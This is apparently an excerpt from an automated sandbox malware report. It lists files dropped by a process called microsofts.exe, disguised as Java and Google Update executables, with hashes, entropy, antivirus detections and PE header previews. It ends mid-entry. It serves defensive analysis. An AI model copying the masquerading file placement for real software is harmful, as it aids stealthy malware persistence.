                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:/oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZGsqjnhMgeiCl7G0nehbGZpv:W4i0wGJra0uAUfkVy7/ZKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:13BE8D62222F89D81DB4E1A0832C9F95
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:29EB17F5C5E1BA82719936F3D68A5A62E8C2D0DB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A095775E03DB8624EB1D9922BE34B6A9D2E363F0AA2F0F23B2C62601D214C5D4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0CB8F315F748C89063BD16A187BAFFDB5277658643DA4F8B273616EEB02FCDC1842C192EF52DB69322236CED8A7787997A5A4DF3AEF92D603C2F3940A25D285B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................YU..........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.448741313363
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:WeR0gB6axoCf0R6RLQRF/TzJqe58BimBsqjnhMgeiCl7G0nehbGZpbD:SgHxmR6uBTzge5MimVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3526371DB6572E0ECDA5035B75799941
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D24393425FDF63F962C3E64EF9D735ECD3FF02D3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:86A7CD302C3DE2F9FC1EA97BA2A71FF48F242919BF0273D6F58F5C7C95D4E28C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DDBF4CFAE1AABD1E36646D3137F2985902B4FEED77B9B5EA2EC0E642B0451DAD62DA5BD38636BAAC0C1C0AFA8321AD8139A7F2BC63AAD47FE2FDE624BB7D488D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......A.......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.446059826291047
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:UnEbH0j4x7R6SvyCMjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:UkwOtO7jsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A55043CAC8BDEE9902AB2AB41C671FF8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:25D1773A644E1DDCC54B5D9C4283A09530B72B30
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:17D2147C3D9872A139D0F8A45241550536B058FD1FF78E4CB2AE619DB43C8053
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7BF6AA70AAACB48D224F0A5725CB9421F8F6F3B6B55EE71D8987468AA04F9C6EDED4F3476514BA3E9642E044C27E01627255D7A0969BE635891A3BAC8EF1C857
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......n.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.446808895916091
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:anU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:aU/V8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F463B7AEC4E31D1415E9E254B05AEF59
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1A45E660EACDE2D750A8A5FCA75A99248AED934D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7473F9D9FA6DDD61B7029F5A7E67EE69790FFE7F69890E0B285B22DB2C51CC2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:558B85BAEF1878A69D809A3D53AB5D8E95E3B6A24D1DC14C58C03E7D4DE21176AE8515AC6D46485756AF34114C35B4E0011C6F2E381E7C8B86152C547D55D4B0
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......,........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.483734536968897
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Jx71iBLZ05jNTmJWExfsqjnhMgeiCl7G0nehbGZpbD:JxhiHIjNgDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C8E7348AA892774FA4FD0A5D4C92D2A3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6D726277AE3D00CA0F36E7AF3E0F5B0408E849FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E37DF8E4BCBFBE3869B9461F776DF6443063B881815DB4FEC69E0C7509ABF7A3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EF65B18B0A930348CADC83C6EBA11B33C5E4B36E54BDB83255393C184DED06E4B3DD56FE660BF39F95E9253368CFEEDE2140F908E3FFC5504AD75FA75003B0DE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................e...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.466699531616397
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:WlnRklQ6fgJcEwix5sqjnhMgeiCl7G0nehbGZpbD:yoRfgJcEwC9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FEF4EF6658FB944B44687D6086009712
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5A506085FA0FEA916E425D7484E3B76A416B9082
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AF6771B72196F6F48EE170E6C027BC42B4F7795DD9A66EFDD0D4B899BC7F1467
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F75086768A840F4B0C87F10D9818D144AF92F1CB3D82BBC134918799A0CBD6B02F5B089B09698DCBB61BF10AA50041E8023D97280919C135DB98E983CE9608F5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.49651774077761
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:yW25k8hb0Haw+xJsqjnhMgeiCl7G0nehbGZpbD:yWyk8SHawmNDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:50F516A22047EBE78859D3A0297D423A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D3A96E3F2638BA53EE012B460A9B295056639220
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:38DF6979E5E97A93E252256B4A5ACB203C8CE1120434502D15E677EAED543EC1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:563E7C4F3B3CCCF1F74AA6EB536D1271991AA70AEB7445BF204CDBD4EA5F864C79645675459F48DEE7D334D187F882CD2AEC635BCE931B7294A500956130ED91
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................F..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163943295242343
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:EWP/aK2vB+KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:EKCKABxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07EE3710F13662D50451BB21858587DA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CE91E07D290E2D9287D2FFE323A726EBB5C9A35C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:522A51A302BF80442F9D745A685DF1FC8EA53E54AC7EBF35968ECFEAE85E683B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:43B36E82B472719A3C24ECFFC5E6E60B8FF0773650428CD49064331893399C6889CFE4F5E45476D302853DFC806C2CD302178D3F2D05FC75C0EEAFD2847E510F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.16201754756879
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:sO7cCNWB+09wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:JjNWBP6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:86FF7D7BBBFCFADCD8583DEDCC29DB07
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ED3FEF9DEA639EFCDDB1CF7C0E167ED141987478
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF468E779F14567D32C0E1292E9B07465DC97470DF21890E6A1C3321C40F9517
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DC10EE455EBABCBC60091B365BCBDD3956C91EBA13C4E2E1FF29B204961B7F29C689FD5DCE44458C8268BE92DB55167867FB7173EBE24CFA351BCF6093B67A16
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@................................."........................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238923595025769
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:7ihRyhdsRr0sqjnhMgeiCl7G0nehbGZpbD:7ihsoRQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9E700A8BBCB7AEF7BE050EF485E7B350
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E8454E7E0011271A130667B159215919604F8633
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2AFC310360E9E805E0FDA3B7F5E10BC6A41C5BA524BFE3DE960B6245FB8B49A6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2D328733CAAC36E475615AFF3FCCCCC0FD3A4FD212CD782B1C320E24C04E78442C609F1400CF2C1183397743E5F10205391E7DB62ABAD49371358AAE046CB627
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......CX.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.351000433866241
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:11FDmRF+wpx/Qaf7sqjnhMgeiCl7G0nehbGZpbD:lmRF+wn/JfvDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:768B759266795D08B00DD6F384CBDAE4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EFF7C7CCB7D7861E8CFC11A0F624B7A9C357A869
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:100B643DEEE4F0E146593AD083E3269762304684B34075A4D99EE2BF3390F650
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:163D6918EFA157FFABE1CD74C7B35B24309005CE469CCE825D083FCEF3C3A142099E4597647D181EC2E8D8692E0C2330619DC68E5CE61BE5EA845270CEB5376E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................i................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.161984703387098
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:k2Ae621B+0YmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:BE21BPlsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8CE9631808D29000B669CCA3CDE3CA3A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7F0900B72804F0C6B6C0078143BAEABEE3F48033
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:608A516BE8A14CF5E7171933A901BCB6E5FE750CB9C0389F4B4C414A18FFC89A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9057F8711398B21AAC4D128A27647D3CDFFD93C11F9DE9806B886FD72A4D728D60CF5682F58D05F329104CC8535BA3A0836943102A584378F965C29CC771D0B7
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):105669632
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99998984805857
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
